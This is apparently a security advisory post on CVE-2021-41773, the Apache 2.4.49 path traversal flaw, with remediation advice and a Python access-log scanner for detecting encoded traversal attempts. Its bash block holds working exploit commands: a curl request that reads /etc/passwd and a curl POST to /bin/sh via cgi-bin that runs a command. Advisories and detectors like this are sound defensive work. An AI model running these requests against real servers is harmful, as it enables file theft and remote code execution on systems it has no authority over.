CVE-2021-41773 affects Apache HTTP Server version 2.4.49. A flaw in the path normalization algorithm allows an attacker to bypass security constraints. Specifically, the function that converts a URL into a filesystem path does not adequately sanitize input containing path traversal sequences (e.g., `../`). If the `require all denied` directive is not set, a maliciously crafted request can map URLs to files outside of the document root. For example, a request like `GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1` could escape the web root. Furthermore, if mod_cgi is enabled and a CGI script is accessible, this path traversal can be leveraged for remote code execution by sending unexpected HTTP headers, turning a directory traversal into a command injection vulnerability.
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
Date: 2021-10-05
Prediction: 2021-10-07
What Undercode Say:
```bash
# Check server version
httpd -v

# Curl request to test for path traversal
curl -s "http://target:80/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

# Example exploit for RCE if mod_cgi is enabled
curl -s -X POST "http://target:80/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo; id"
```
How Exploit:
An attacker sends a crafted HTTP request with URL-encoded path traversal sequences (`.%2e/` or `%%32%65`) to access files outside the web root. If mod_cgi is active, they can execute system commands by targeting a CGI script.
Protection from this CVE:
Upgrade to version 2.4.50. Implement strict configuration rules using `require all denied` for directories. Sanitize all user-supplied input.
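To check whether a server has already received the encoded traversal requests described above, the access log can be scanned for paths that only contain `..` after percent-decoding. The following is an added example, not code from the original post or from the Apache project; the log lines are constructed, and the names `fully_decode`, `escapes_root` and `inspect_line` are hypothetical.

```python
import re
from urllib.parse import unquote

# Request line and status code from an Apache common/combined log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample entries (addresses from documentation ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Oct/2021:10:01:02 +0000] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1423',
    '203.0.113.7 - - [06/Oct/2021:10:01:09 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 403 199',
    '198.51.100.4 - - [06/Oct/2021:10:02:00 +0000] "GET /icons/apache_pb.png HTTP/1.1" 200 1797',
    '198.51.100.4 - - [06/Oct/2021:10:02:05 +0000] "GET /docs/100%25-coverage.html HTTP/1.1" 200 512',
]

def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so nested encodings (%%32%65 -> %2e -> .) collapse."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_root(path):
    """True if '..' segments climb above the directory the path starts in."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def inspect_line(line):
    """Return a finding for a log line whose decoded path contains '..', else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    raw = m["target"].split("?", 1)[0]
    decoded = fully_decode(raw)
    if ".." not in decoded.split("/"):
        return None
    return {"status": int(m["status"]), "decoded": decoded,
            "encoded": ".." not in raw.split("/"),  # traversal hidden by encoding
            "escapes_root": escapes_root(decoded),
            "served": m["status"] == "200"}  # assumption: 200 means content was returned

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry))
```

A flagged entry with `served` set to true should be triaged first, since the server answered the traversal request with content.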
Impact:
Unauthorized file disclosure. Potential remote code execution. Complete system compromise.
Sources:
Reported By: nvd.nist.gov

